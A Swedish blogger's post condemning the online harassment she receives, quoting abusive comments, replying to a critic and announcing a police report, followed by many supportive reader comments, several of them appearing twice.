Polisanmäl trollen! -DELA! Säg NEJ TILL NÄTHAT!

040416-MyMartens-DSC_5490my-173524

Det var en gång en flicka….  En flicka från landet. En ung kvinna och mamma. Som av en slump och händelse fick möjligheten att uppleva sitt livs äventyr  genom TV3 produktion ”Ensam mamma söker”.

En kvinna som inte var insatt i sociala medier. Genom hennes kontrakt blev  hon med blogg, på TV3s sida. Det skrämde henne.  dels pga av dyselexin, men också pga att  att hon inte förstod sig på socialmedier Men flickan var sedan unga år en entreprenör.

Så ganska snabbt insåg hon att blogga faktiskt inte bara är en hobby utan ett jobb. Nu ett par år senare med betydligt mer erfarenhet så har bloggen vuxit. Vuxit och blivit riktigt stor. Flickan också…

Flickan ser ut som en vanlig tjej, lite sneda tänder, ett brokigt för flutet, ensamstående, och egentligen inget hot om du frågar mig.

Men att flickan dessutom gjort en viktresa ner från 100 kg, och brinner för att peppa och motivera andra. DET retar gallfeber på folk?! 

I sammband med att bloggen vuxit så har också näthatet och trollen förökat sig. Avundsjukan och missunnsamheten hos andra bloggerskor blir snabbt påtaglig. Precis som i vilken annan bransch  som helst, så finns det extremt många som gör allt som står i sin makt för att sabotera.  NU syftar jag INTE på någon speciell utan benämner detta rent generellt!

DET är inget nytt för mig. Det är jag van vid både sedan min butik My’s Blommor. Men också som grossist ifrån Holland.   Jag har bara så svårt att förlika mig med varför?!

 När flickan blev ett för stort ”hot” då blir man rädd och attackerar. Brutalt!  Jag kan bara inte förlika mig med det heller. Jag vill inte ”lära” mig det fula spelets regler. Jag bara vill inte det! 

Jag är inte född och uppvuxen så! Nu såklart förstår du ju att flickan är jag själv. JAG är så fruktansvärt trött på att bli sparkad på när jag ligger ner!

DET ÄR INTE LÄNGRE OKAY! 

Vi tar ett annat exempel:  Om någon skulle öppna en butik intill min egna blomsterbutik (som jag inte längre har) Då hade jag snabbt samlat personalen, gått in i en service diskussion, lagt en plan och strategi för att maximera butiken på bästa sätt. Jag skulle bara fokusera på att förbättra det jag kan påverka dvs, min personal, min butik och mig själv. INTE lägga min energi på att förstöra, baktala eller jävlas med någon annan. Men det är ju hur JAG fungerar, och jag kan bara tala för mig själv! 

Ja, då var vi här igen. Näthat, näthat och mera näthat. VARFÖR detta näthat?

När en person gömmer sig bakom en falsk mailadress, bakom ett IP nr som inte går att spåra. Då har man, enligt mina tankar en anledning till detta. Då har man någonting att dölja.

Att vara en bloggare i offentlighetens ljus är självvalt. Men det innebär inte att man ska behöva ta emot skit. Man ska inte behöva få höra det jag DAGLIGEN får höra. Det är lika dumt som att säga om kvinnan som blivit våldtagen ”hon hade för utmanade kläder på sig, hon får skylla sig själv”

-BULLSHIT!!!!!!!!!!!!! Kvinnans kropp, kvinnans beslut! DET, spelar ingen roll om hon vandrat omkring naken! Ingen har rätt att förgripa sig på henne ändå!

Min blogg, MINA känslor,  ingen har rätt att trakassera och hota mig! Med det sagt så behöver inte alla hålla med mig, vi behöver inte als ha samma åsikt. Men att gå till personangrepp, hota och förgripa sig på min integritet. DET är iNTE okay!!!  

 Vi tar några exempel som jag på senaste tiden har vaknat till: 

”hahaha! Du är för fet för att jobba som trendspanare”

”stackars barn han är lika ful som dig!”

”du är för tjock för att vara modell, hur kan företagen välja dig!!! hahahahaha

”Alla vet vad du har gjort, du är äcklig, ingen vill va med dig, stick till helvetet” 

”hur kan du som är så tjock skriva om träning? du är ett skämt”

”jävla dyslexi fitta gå i skolan för helvete” 

”Du är ett skämt, med ditt arsle har du aldrig varit på gymmet”

”du är en lögnare, som bara ljuger i din blogg”

”du lämnade öland för att du var AIDS smittad, Öland blev för litet för dig. Men med ditt bagage så är Stockholm det också”

”Du är ingen bra mamma, du borde lämna ifrån dig till SOC, lämna pojken till sin pappa där han har det tryggt”

image

Detta är efter omständigheterna bara en bråkdel av allt obehagligt jag får höra. Långt ifrån det värsta.

Det cirkulerar även  sex-listor med namn från halva sveriges ”kändis män”. Mina vänners män och x-män står också med på listorna.

 För det första vem och varför jag ligger med någon är helt upp till mig. Jag är singel och gör precis vad jag vill. Men även jag har integritet, och i dom där listorna så var i stort sätt alla fel. Jag ligger inte med gifta män. Det finns gott om singelmän om jag nu skulle vara ute efter ett ligg! Jag VET hur det är att bli sårad och bedragen, jag jobbar INTE så! Ämne en gång en massa påståenden helt utan substans! 

Det som är intressant som jag kommit på med tiden. Det är att det är väldigt många av dom elaka kommentarerna som kommer ifrån ett och samma IP nr, men med olika mailadresser och namn på varenda kommentar. DET tog ett tag innan jag kom på. Så i det store hela så handlar det om några få människor. Majoriteten av mina läsare är ju helt fantastiska!

Här kommer en annan kommentar, nu har jag valt att ta bort personens uppgifter för jag vill inte att ALLA andra ska se dom. Det skumma är bara att det inte heller går att spåra denna mail/IP nr

Bloggkommentar: Du känns mer o mer som en stor bluff.. Det du skriver rimmar så fel med verkligheten. Vilken psykolog använder du dig av som har dygnet-runt-jour? tipsa gärna för det finns säkert miljoner flera som kan tänkas behöva denna psykolog som alltid finns där o skypar med patienterna. Från att ha varit på botten som du själv skrivit till att ha tusen järn i elden bara ca 4 veckor senare är sanslöst bra jobbat… du har botat dig själv med jourpsykologen o utan medicin … helt otroligt bra… ge oss receptet… som sagt finns säkert miljoner människor som behöver ha samma recept! Det tog mig flera o åter flera år att få kontroll på min ångest… lika lång tid tog det innan jag våga mig ut i det sociala. Nu säger inte jag att alla tar flera år på sig men som du förklarat ditt hälsotillstånd så har det låtit som du har varit helt down under o i min o många fleras verklighet så är man inte på banan igen efter bara dryga 4 veckor… o då oxå utan medicin… helt otroligt!

Jag ska sluta läsa din blogg för det du skriver blir som ett stort hån mot alla som verkligen ÄR sjuka.. o det är väl eg inte första gången du i din blogg nervärderar andra.

Jag förväntar mig inte att denna kommentar kommer igenom i vanlig ordning när du får kritik… el så gör den det bara för att du ska kunna svara på ett totalt avståndstagande sätt där du säkert känner dig orättvist behandlad… stackars lilla My!

Jag gör undantag och går in och svarar på denna typen av kommentar. för att jag känner att jag vill det. personen har tagit sig tiden att skriva väldigt mycket och även delat med sig av sina egna bekymmer.

Här kommer MITT svar: 

Hej ”Caboom”! Vad skönt att du ändå, som du skriver går hittat ut i det sociala, det glädjer mig verkligen. Och det menar jag, från hjärtat <3

Jag förringar inte att det kan ta år att få kontrollen över sin ångest. Detta hade varit mycket lättare att sitta ner och prata om, öga mot öga med en kopp te. Men jag ska göra mitt bästa för att svara.

Först och främst så vet du ingenting om min bakgrund, eller tidigare erfarenheter. Det vet inte jag heller om dig och dina erfarenheter. men av din kommentar så kan jag utläsa att du har haft det tuff och att du har din erfarenhet av ångest. Jag har precis som alla andra ett bagage bakom mig. Jag har bott själv sedan 14 års ålder. jag har varit omhändertagen av LVU, suttit inspärrad på ett P12 hem. Tillsammans med kriminella. Jag själv satt där ”i väntan” på fosterfamilj. Pappa satt inne då inne.  Detta är information som redan är officiell och som det har skrivit om i media. Vart jag vill komma med det, är att jag redan då fick erfara ångest, kraftig ångest. Som en plugghäst och handbolls nörd var det mer än tufft och inte helt lätt att hamna i för mig denna okända, och otrygga miljö. Redan då började jag med hjälp av psykologer jobba med mig själv och min ångest. Det är alltså snart 16 år sedan, min första kontakt med ångest och psykolog.

Detta har pågått under alla år, mer eller mindre. Vissa perioder har jag knappt känna av det als, andra perioder har jag mått fruktansvärt.

Jag har stött på fler hinder, separation, lämnad med en nyfödd, stölder, bedrägeri, personliga problem, sorg efter dödsfall, haft tillfällig polis överbevakning, varit utsatt för trakasserier och levt ett, vad jag skulle kalla lite ”annorlunda” liv. Så som många andra också har gjort. Jag tror mig inte vara ensam om att känna och uppleva kriser eller ångest, tvärt om. Men jag till skillnad mot ca 97%av resterande befolkning bloggar i det offentliga ljuset. (PÅ gott och ont)

Det har såklart ärrat mig, mitt bagage alltså. Det har satt sina spår. Men jag har också fått skinn på näsan och ett driv jag aldrig kunnat drömma om. Jag anser mig inte vara en sjuk person. Tvärt om, väldigt medveten.

Jag har blivit en entreprenör. Vad jag än gör så går entreprenörs-hjärnan igång. Detta är en bråkdel om mitt liv, resten kommer i min självbiografi. En självbiografi där jag vill utge hopp, där jag vill resa runt till alla motsvarande P12 hem och föreläsa för ungdomarna och ge dom ett hopp, ett ljus i en tunnel om att det går. man tar sig framåt. Ingenting är omöjligt.

DET är vad jag i hjärtat brinner för. Redan där och då på BUP, (Barn och ungdomspsyk) Ville man ge ångestdämpande, men tack vara närstående av mindre bra erfarenheter av detta så lyckades jag slippa detta. Detta var en kamp som det även fick ta soc beslut på. Så redan som barn fick jag ”lära” mig att det är bättre utan. Jag har inagn erfarenhet av ångestdämpande medicin, jag har gått på en annan linje. jag ska öppet och ärligt säga att det skrämmer skiten ur mig! Jag har haft och har både drog, alkohol och tablett (medicinskt) beroende hos närstående. Därför är jag nog så rädd för det som jag är.

Men, jag vet också att flera andra i min närhet genom åren har tagit hjälp av medicin som är ångestdämpande, utan att bli beroende, och som bara har uppfattat det positivt. Så jag dömmer INGEN som väljer att gå den vägen. Verkligen inte. Varken mina närstående, eller dig.

Jag har helt enkelt inte ”vågat” att göra det själv. Jag är långt ifrån färdig. Långt ifrån! Men jag har kommit en bra bit på vägen. Den ångest som jag upplevde för 6-7 veckor sedan, den var inte lik min tidigare ångest. Om du tror att jag fallit ihop och rest mig upp på fyra veckor, då kan jag bara informera om att du har fel. Så är det inte…..

Du ber om en medicin, som du vill att jag ska dela med mig av till miljontals människor. ja, du… OM jag hade haft en medicin, OM jag hade haft svaret på dina frågor OM jag hade kunnat göra någonting för DIG, som jag uppfattar inte mår helt bra, i perioder. Då hade jag gjort det. Jag är i en process där jag jobbar med mig själv, där jag kämpar varje dag för att överleva. Detta är inte en överdrift. Det är precis så det är.
Jag har bett om hjälp och jag tar emot professionell hjälp. Bara det är ett stort steg för mig.

Jag använder mig av måååånga verktyg för att tackla ångesten. Jag kan bara prata för mig själv utefter mina erfarenheter.

Du skriver också att jag släpper igenom ”blogg kommentarer där jag får kritik”. Det är inte heller sant, så är det inte. Är det någonting som du skrivit som har försvunnit? Det enda som hänt är att dom sista veckorna har det lagts på ett filter med vissa namn, så kommentarer med dessa namn INTE släpps igenom.

För att få bort näthat och annat. Rätt eller fel, det är en metod vi valt att ge en chans för att se om det försvinner eller åtminstone minkskar.

Du ber även om kontaktuppgifter till min psykolog. Jag kan givetvis inte skriva det öppet här inne. Men om du vill, så mailar du mig privat på ******************  så kan jag förmedla den till dig därigenom. Hen är fantastisk. Nu när det har varit och är som absolut svårast att hantera så har hen funnits där. Inte dygnet runt, det vore orimligt, men 7 dagar i veckan dagtid! via skype, mail och telefon utöver våra möten. I mina ögon är hen en klippa, helt outstanding!

”Stackars lilla My” upplever jag att du skriver med en ganska bitter och elak ton. Jag hoppas att jag har fel.

Stort lycka till både med ångest & framtiden <3 Mvh My
Ps: om du vill läsa bloggen eller inte, det är helt upp till dig. Det är just det som är så otroligt bra med sociala medier, att man väljer själv vilka man följer och inte följer.DSC_5749-2

Vart jag vill komma med detta är att jag har fått nog! jag har fått nog av att bli förföljd av vissa nättroll, jag är trött på att bli behandlad såhär.

Man MÅSTE ju kunna hitta ett sätt att kontrollera IP nr och mail adresser? Med tanke på hur stort det är med sociala medier idag, alltså inte bara bloggar så borde lagarna ses över rejält!

Det är straffbart att ge sig på en människa, irl. Dvs Förtal, kränkning, hot, trakasserier. Nu j*vlar har jag fått nog!

Jag tänker polisanmäla detta. För att ta upp ämnet, för att det förhoppningsvis ska blir bättre för både mig själv men också för andra i framtiden. Så länge vi inte gör någonting, då kommer trollen att fortsätta, vuxenmobba, hota och ge sig på!!!

Nu sätter iallfall jag ner foten och säger NEJ TILL NÄTHAT!!!!!

Att bli kallad tjock, ful, värdelös. DET kan jag ta. Absolut, det rinner av mig som en gås! jag är en kvinna med former, jag är en mamma. Jag duger precis som jag är!

MEN att få påhopp om min, son, min roll som mamma. Att bli hotad på grövre sätt än det som står ovan!

Det accepterar jag inte längre! Det skärmmes mig hur långt vissa människor är beredda att gå! 

-Enough is enough! 

Jag hade tänkt att blogga om min dag i skolan som har varit helt fantastisk.Vi har kört HLR & Biomekanik med Marcus och Micke. Jag hade tänkt att skriva HUR viktigt det är att gå HLR (Hjärt och long räddning) Jag tänkte lagt upp ett recept….

150816-MyMartens-P8151113-143247

Jag har lyckats träna både på lunchen och efter skolan. Jag hade en massa roliga grejer att dela med mig av. men jag är FÖR IRRITERAD just nu. Gällande min träning och min utbildning på skolan SAFE, så gör jag det för att jag brinner för det. jag ser fram emot att kunna peppa och motiverar andra till att mår bra genom träning och hälsa. För det är just träningen och hälsan som hjälpt mig genom mina värsta kriser i livet. Genom mina egna erfarenheter av min viktnedgång på nästan 40kg så har jag även just erfarenheten att luta mig mot. Det, tillsamens med utbildningen och så småningom erfarenheten av att jobba som PT kommer bli grym!

 Jag har ägnat kvällen åt för mig terapi arbete. Lite bakning. Orkar inte ens lägga upp receptet…  Jag ska titta på mina elektriska ljus som inte blåser ut. Som lyser så vackert i mörkret, och bara njuta av lugnet och tystnade….. 

image

Jag ska logga ut. För kvällen. Så tack för idag! 

OCH TILL ALLA ER SOM INTE ÄR NÄTTROLL ELLER missunsamma bransch kollegor, NI är fantastiska!!!!! <3 -Tack!

Gör mig nu en tjänst DELA detta inlägget med skrift NEJ TILL NÄTHAT!!!  Tack Åza som lyfter ämnet! ( HÄR )

/My Martens

190 Komentarer

 1. Är för djävligt hur människor kan bära sig åt men du skit i dom du är så duktig och har en underbar son önskar dig lycka till i framtiden kram

 2. My, jag tycker du verkar vara en fantastisk människa som verkligen med stor ärlighet delar med dig av ditt liv.
  Låt inte näthatet tysta dig.
  Förstår att det måste kännas för djävligt att läsa dessa kommentarer och att det gör ont.
  Jag tycker dock att du verkar vara en oroligt stark och klarsynt kvinna och jag blir bara imponerad och glad av dina blogginlägg.
  Stå på dig och låt inte näthatet tysta dig ❤️

 3. Heja dig My!! Så stark och så grym är du! Världens bästa My!!❤️ Fattar inte hur vissa människor kan var så elaka.
  Stå på dig My du är grym, bästa bloggen❤️ Kram på dig!!

 4. Man skäms som medmänniska att det finns såna jvla idioter som skriver så otroligt elaka saker… Säger ganska mycket om dom personerna, bittra, ouppfostrade o det mår nog väldigt dåligt själv.. Men att spy sin egen ilska och bitterhet på någon annan är absolut INTE okej.
  My, du verkar vara en härlig tjej och en fantastisk Mamma åt din så söta son. Stå på Dig! Önskar Dig all lycka i framtiden.
  Kram

 5. Jag håller på dig My! Du är en i mina ögon en sympatisk, framåt och ansvarstagande kvinna. En person som kämpar och bryr sig om sin familj. Jag är imponerad av vad du åstadkommit.
  Det är tragiskt att dessa nättroll utsätter sina medmänniskor för allt detta hat. Det gynnar ingen, inte dem själva heller. Hatet förgiftar dem själva också men framför allt de som de riktat in sig på.
  Livet är inte alltid lätt men varför försöka förstöra för dem som strävar framåt och vill andra väl?
  Vill sända dig en stor pep, du är tuff och bra!

 6. Du gör rätt i att sätta ned foten. Jag har läst och blivit förskräckt över hur någon/några? väljer att skriva till dig. Det är INTE okej att skriva såna hemska elakheter till någon annan person. Jag hoppas att du ska slippa fler påhopp av det slaget som du räknat upp här i inlägget. Om dom inte upphör så hoppas jag att din anmälan kommer att leda till att de som näthatar får stå upp och ta ansvar för vad dom skriver. Fattar dom inte att du är en människa precis som alla andra? Fy, skäms på er som sprider dynga. Gillar ni inte bloggen så sluta då att läsa!
  Kram

 7. Bra skrivet. Sakligt och förståndigt. Om du anmäler så lär polisen ta fram vem som gömmer sig bakom skärmen. Ni ska inte behöva tåla vad som helst även om man bör få vara anonym så ska man inte gå till personangrepp och hot. Du skriver och beskriver dina känslor och intryck på bra mycket bättre sätt än en del av dina dubbelt så gamla bloggkollegor, tummen upp

 8. Fy för alla dessa elaka människor.
  Du är en fantastisk kvinna och en underbar mamma.
  Låt ingen få dig att tro ngt annat.
  Kämpa på
  Kram

 9. Du gör helt rätt som anmäler!!! Låt ingen trycka ner dig & ta ifrån dig din studieglädje.
  Det är ren & skär avundsjuka. Kram fina du!!????

 10. Det gör mig illamående hur jävla dumma människor kan bli. Att även andra bloggerskor baktalar dig!@ inte ok någonstans. Jag är modell äldre och skulle kunna vara fin mor? skulle ha älskat att haft dotter som dig ❤ stå på dig varm kram

  • Jag ser blogger- hat som ren avundsjuka . Inget annat. Läste förut om hur man älskar sina fans som aldrig ger negativ kritik, henneskommentarsfelt höjs till skyarna. Det gillas på odd molly, over and out. Det är så sjukt synligt hur h*n kontrar dig, i inlägg efter inlägg. Just nu hedrar hon alla sina följare…. Vi är fan inte dumma i huvet …..

 11. Vad klokt skrivet My. Jag kan inte förstå vilka dessa människor är som sitter och lägger ner tid för att skriva elaka kommentarer. En fråga jag skulle vilja ha svar på från någon av de bittra människorna är, – Köper ni en bok som ni vet redan innan att ni inte gillar? Eller en skiva med musik som ni inte tycker om? Endast för att kunna förpesta tillvaron för den/de som är författare eller artist? Om svaret är nej på den frågan så borde det gälla även på bloggar, du väljer själv om du vill läsa, det går att låta bli att besöka bloggen precis som det går att låta bli att köpa den där boken eller skivan. Med dagens teknologi är det inte speciellt svårt att spåra användare på nätet. Precis som om du mobbar eller är elak mot en kollega på jobbet som ”förhoppningsvis” får starka reaktioner i form av varningar eller uppsägning så borde detsamma gälla denna typ av mobbing och elakheter. Nu blev min kommentar väldigt lång, men jag blir så arg av att läsa om sånt här. Ett gästinlägg från ett gammalt ”nättroll” skulle vara intressant. Grymt bra initiativ från dig My ?.

 12. De som inte kan se att du har lyckats att kravla dig upp från ditt mörka hål och tar tag i ditt liv, trots att du har levt i kaos, dessa bittra stackare som bara ser mörker och säkert mår skit på riktigt. Dessa nättroll, så små och missnöjda med sig själva. Men, att missunna dig ditt mående, hjälper ju knappast upp deras eget välbefinnande. De har tagit patent på att må dåligt, har svart bälte i depression och ÄR sin sjukdom, dessa är det ju synd om på riktigt. Vilka goá energier kan hen sprida? Förstår att hen inte kan se hur du lyckas genom ditt inre driv att ta dig samman. Du är en förebild! Tänk vad du skulle kunna hjälpa många med alla dina erfarenheter.
  Tycker också att andra bloggare borde ta mer ansvar för uppvigling mot andra bloggare i sina kommentarsfält. Har väl sett ett och annat genom raderna. Exhibitionist må va, men narcissist , ajajaj, där fick några en släng av sleven. En ytlig värld, där ytliga ting verkar vara det viktigaste…. Huvudet i himlen och fötterna på jorden är ett bra komihåg. Försök att skita i alla missunnsamma stackare, som är sjuka på ett eller annat sätt. Håll i din energi och fortsätt på det spår du är. Gå din egen väg. Du är stark nog för det, vilket man inte kan säga om många. Allt gott till dig!

 13. My,
  Tårarna bränner…å jag är ingen mes direkt. Att du orkar! Å att så lågt ge sig på det finaste vi har; våra barn! (Men idioten/idioterna vet att det är det som gör ondast).
  Bra att du går till polisen med detta.
  Kämpa! Du är bra och ska vara stolt över din goda ton i ditt bemötande mot dessa fula påhopp.
  Kram Madde
  PS Ljuvlig liten herre du har. Så söt! <3

 14. Är för djävligt hur människor kan bära sig åt men du skit i dom du är så duktig och har en underbar son önskar dig lycka till i framtiden kram

 15. My, jag tycker du verkar vara en fantastisk människa som verkligen med stor ärlighet delar med dig av ditt liv.
  Låt inte näthatet tysta dig.
  Förstår att det måste kännas för djävligt att läsa dessa kommentarer och att det gör ont.
  Jag tycker dock att du verkar vara en oroligt stark och klarsynt kvinna och jag blir bara imponerad och glad av dina blogginlägg.
  Stå på dig och låt inte näthatet tysta dig ❤️

 16. Heja dig My!! Så stark och så grym är du! Världens bästa My!!❤️ Fattar inte hur vissa människor kan var så elaka.
  Stå på dig My du är grym, bästa bloggen❤️ Kram på dig!!

 17. Man skäms som medmänniska att det finns såna jvla idioter som skriver så otroligt elaka saker… Säger ganska mycket om dom personerna, bittra, ouppfostrade o det mår nog väldigt dåligt själv.. Men att spy sin egen ilska och bitterhet på någon annan är absolut INTE okej.
  My, du verkar vara en härlig tjej och en fantastisk Mamma åt din så söta son. Stå på Dig! Önskar Dig all lycka i framtiden.
  Kram

 18. Jag håller på dig My! Du är en i mina ögon en sympatisk, framåt och ansvarstagande kvinna. En person som kämpar och bryr sig om sin familj. Jag är imponerad av vad du åstadkommit.
  Det är tragiskt att dessa nättroll utsätter sina medmänniskor för allt detta hat. Det gynnar ingen, inte dem själva heller. Hatet förgiftar dem själva också men framför allt de som de riktat in sig på.
  Livet är inte alltid lätt men varför försöka förstöra för dem som strävar framåt och vill andra väl?
  Vill sända dig en stor pep, du är tuff och bra!

 19. Du gör rätt i att sätta ned foten. Jag har läst och blivit förskräckt över hur någon/några? väljer att skriva till dig. Det är INTE okej att skriva såna hemska elakheter till någon annan person. Jag hoppas att du ska slippa fler påhopp av det slaget som du räknat upp här i inlägget. Om dom inte upphör så hoppas jag att din anmälan kommer att leda till att de som näthatar får stå upp och ta ansvar för vad dom skriver. Fattar dom inte att du är en människa precis som alla andra? Fy, skäms på er som sprider dynga. Gillar ni inte bloggen så sluta då att läsa!
  Kram

 20. Bra skrivet. Sakligt och förståndigt. Om du anmäler så lär polisen ta fram vem som gömmer sig bakom skärmen. Ni ska inte behöva tåla vad som helst även om man bör få vara anonym så ska man inte gå till personangrepp och hot. Du skriver och beskriver dina känslor och intryck på bra mycket bättre sätt än en del av dina dubbelt så gamla bloggkollegor, tummen upp

 21. Fy för alla dessa elaka människor.
  Du är en fantastisk kvinna och en underbar mamma.
  Låt ingen få dig att tro ngt annat.
  Kämpa på
  Kram

 22. Du gör helt rätt som anmäler!!! Låt ingen trycka ner dig & ta ifrån dig din studieglädje.
  Det är ren & skär avundsjuka. Kram fina du!!💙💜💚💕

 23. Det gör mig illamående hur jävla dumma människor kan bli. Att även andra bloggerskor baktalar dig!@ inte ok någonstans. Jag är modell äldre och skulle kunna vara fin mor😉 skulle ha älskat att haft dotter som dig ❤ stå på dig varm kram

  • Jag ser blogger- hat som ren avundsjuka . Inget annat. Läste förut om hur man älskar sina fans som aldrig ger negativ kritik, henneskommentarsfelt höjs till skyarna. Det gillas på odd molly, over and out. Det är så sjukt synligt hur h*n kontrar dig, i inlägg efter inlägg. Just nu hedrar hon alla sina följare…. Vi är fan inte dumma i huvet …..

 24. Vad klokt skrivet My. Jag kan inte förstå vilka dessa människor är som sitter och lägger ner tid för att skriva elaka kommentarer. En fråga jag skulle vilja ha svar på från någon av de bittra människorna är, – Köper ni en bok som ni vet redan innan att ni inte gillar? Eller en skiva med musik som ni inte tycker om? Endast för att kunna förpesta tillvaron för den/de som är författare eller artist? Om svaret är nej på den frågan så borde det gälla även på bloggar, du väljer själv om du vill läsa, det går att låta bli att besöka bloggen precis som det går att låta bli att köpa den där boken eller skivan. Med dagens teknologi är det inte speciellt svårt att spåra användare på nätet. Precis som om du mobbar eller är elak mot en kollega på jobbet som ”förhoppningsvis” får starka reaktioner i form av varningar eller uppsägning så borde detsamma gälla denna typ av mobbing och elakheter. Nu blev min kommentar väldigt lång, men jag blir så arg av att läsa om sånt här. Ett gästinlägg från ett gammalt ”nättroll” skulle vara intressant. Grymt bra initiativ från dig My 👊.

 25. De som inte kan se att du har lyckats att kravla dig upp från ditt mörka hål och tar tag i ditt liv, trots att du har levt i kaos, dessa bittra stackare som bara ser mörker och säkert mår skit på riktigt. Dessa nättroll, så små och missnöjda med sig själva. Men, att missunna dig ditt mående, hjälper ju knappast upp deras eget välbefinnande. De har tagit patent på att må dåligt, har svart bälte i depression och ÄR sin sjukdom, dessa är det ju synd om på riktigt. Vilka goá energier kan hen sprida? Förstår att hen inte kan se hur du lyckas genom ditt inre driv att ta dig samman. Du är en förebild! Tänk vad du skulle kunna hjälpa många med alla dina erfarenheter.
  Tycker också att andra bloggare borde ta mer ansvar för uppvigling mot andra bloggare i sina kommentarsfält. Har väl sett ett och annat genom raderna. Exhibitionist må va, men narcissist , ajajaj, där fick några en släng av sleven. En ytlig värld, där ytliga ting verkar vara det viktigaste…. Huvudet i himlen och fötterna på jorden är ett bra komihåg. Försök att skita i alla missunnsamma stackare, som är sjuka på ett eller annat sätt. Håll i din energi och fortsätt på det spår du är. Gå din egen väg. Du är stark nog för det, vilket man inte kan säga om många. Allt gott till dig!

 26. My,
  Tårarna bränner…å jag är ingen mes direkt. Att du orkar! Å att så lågt ge sig på det finaste vi har; våra barn! (Men idioten/idioterna vet att det är det som gör ondast).
  Bra att du går till polisen med detta.
  Kämpa! Du är bra och ska vara stolt över din goda ton i ditt bemötande mot dessa fula påhopp.
  Kram Madde
  PS Ljuvlig liten herre du har. Så söt! <3

 27. Jag kan inte för mitt liv förstå hur dessa människor orkar följa en blogg, läsa långa inlägg och lägga energi på att kommentera elaka saker!!
  Herregud hur svårt kan det vara att bara strunta i att läsa?! Så slipper de reta sig på allt och alla!!!!
  Bra att Du och flera mer eller mindre kända personer markerar att det inte är okej!
  Härligt i alla fall att se att du verkar trivas på utbildningen, det ”känns” i dina inlägg att du mår bra där! ?
  Ha en bra dag!
  Kram!

   • Den människan kommer kontra dig till död-dagar ( hon är så jävla avund att…öh?) och hennes genuina avundsjuka till dig kommer ta död på dig om Du tillåter. ,Hon är sjukt elak på alla tänkbara nivåer . Din ungdom svider överjävligt i henne där hon tvingas göra plastik och botox. Trist!! Jag trodde detta paret va vänliga men är tyvärr sjukt narsic….nä uttalar det inte. Der räcker ! Jag följer iaf dig för attdu verkar genuin å jävligt gullig. Sov gott! ?

 28. Kära My!
  tråkigt att du ska behöva stå ut med så mycket hat. Jag fattar inte hur dessa fega människor orkar hålla på. Anmäl allt! Låt andra hålla på med det !
  Ge dom inget mer utrymme!
  Jag säger bara Go Girl! Vi är många som tycker om dig! Fokusera på det!
  Kramar ?

 29. Tycker nästan synd om en människa som skriver så mycket otrevligt till någon annan, dessutom tar sig tid att läsa din blogg ordentligt och veta allt om allt du skrivit och sen lägga ner sån oerhörd energi på att ge sig på dig i skrift – för mig är det helt oförklarligt och meningslöst helt enkelt.
  Undrar alltid vad som driver en människa att avsky någon så till den milda grad, stackars människa ett sånt litet liv och ta sig tiden av sitt liv att avsky andra och smutskasta än att leva gott för sig själv och andra, unna glädje och lycka till andra människor. Inte undra på att fred på jorden aldrig händer förrän de onda hatarna tagit slut på allt gott liv som finns och förgör varann.
  Kramar till dig och all lycka önskar jag dig framöver o noll trollmejl hos dig vill jag se ♥

 30. Fy fasen vad vidrigt, bra att du går till polisen med detta. Måste ju gå att få reda på vilka eller vilken som utsätter dig för dessa fruktansvärda kränkande kommentarer.
  Bra att du lyckas koncentrera dig på dina studier trots allt.
  Kram

 31. Nu tror jag inte ett dugg på skvallret om att Mys bästa väninnors män/makar/pojkvänner har legat med My för OM det vore så, hade väninnorna förmodligen separerat från sina otrogna karl-sluskar på studs. De som har minsta lilla självrespekt kvar, vill säga. ?
  Men OM nu Mys bästa väninnors män stöter på My eller tom har legat med henne så bör de otrogna slibbiga gamla gubbarna hängas ut på Flashback per omgående.
  Den som påstår att My skulle vara tjock och ful måste gå till optikern och kontrollera synen. Alternativt åka till psyket för att få hjälp med att kontrollera sådan osund och sjuklig avundsjuka och bitterhet.

 32. Snubblade över ett delat inlägg på Fb och läste ditt inlägg. Du har redan skrivit det mesta om vad som kan sägas i ämnet och det är tråkigt att du behöver uppleva detta bara för att du är du och gör det du vill.
  Finns ingen logik i att folk sitter och hoppar på folk, där bakom sina datorer med svartsjukan dundrande i skallen. För en del av problemet är att det finns många bittra i sina egna ögon ”misslyckade” själar, ”offer” – som inte kan unna andra människor glädje lycka och framgång. Istället för att inspireras och göra något själv är det lättare att spy ut elakheter på nätet. Usch!
  Jag hoppas att du slipper det i framtiden men under tiden: ta åt dig så lite som du kan.

 33. Fast på nåt sätt ger du nättrollen vad de söker när du svarar och gör ett inlägg om det. För alla vet att det inte kommer sluta bara för att du skriver som du just skrev. Och ett nättrolls njutning är ju att se att du reagerar och tar åt dig. Andra bloggare som tex Hanna Graaf och andra får även Hatbrev men lägger locket på. Killen them with silence är det bästa!! De ska inte få utrymme eller njutningen av att veta att du blir upprörd över det. Så nättroll är nog något du får leva med. Har man en stor blogg blir det nog både ris och ros. Men ge aldrig nättrollen utrymme eller din energi som du just gjorde är mitt råd.

  • Ullis. Jag anser att du har en helt felaktig uppfattning. Nu lägger du bördan på My när du skriver ” Fast på nåt sätt ger du nättrollen vad de söker när du svarar och gör ett inlägg om det. ”??
   My ger inte några nättroll näring. Det är nättrollen som intar fel näring istället. Om jag själv hade haft en blogg och VARJE dag mötts av hat från nättroll, så hade jag också polisanmält trakasserierna till slut, i synnerhet med tanke på att man är mamma!
   Att inte agera är detsamma som att man tycker det är ok att folk får kasta skit på en, det är aldrig aldrig någonsin ok. Att barn mobbar varandra är fullständigt bedrövligt, men när vuxna människor mobbar andra så är det anmärkningsvärt i allra högsta grad. De sätter sig själva i sandlådan och trakasserar andra vuxna, och vi vuxna ska vara förebilder för barn, då måste vi också visa det genom att sätta ner foten mot vuxenmobbing.

 34. Massor med kärlek till dig❤️
  De som skriver skit till dig och om dig är så fega, de skulle ALDRIG våga säga det till dig ansikte mot ansikte.
  Det måste bli ett slut på detta näthat. Många som drabbas och som får sitt liv förstört.
  / Lena

 35. Jag kan inte för mitt liv förstå hur dessa människor orkar följa en blogg, läsa långa inlägg och lägga energi på att kommentera elaka saker!!
  Herregud hur svårt kan det vara att bara strunta i att läsa?! Så slipper de reta sig på allt och alla!!!!
  Bra att Du och flera mer eller mindre kända personer markerar att det inte är okej!

  Härligt i alla fall att se att du verkar trivas på utbildningen, det ”känns” i dina inlägg att du mår bra där! 🙂

  Ha en bra dag!
  Kram!

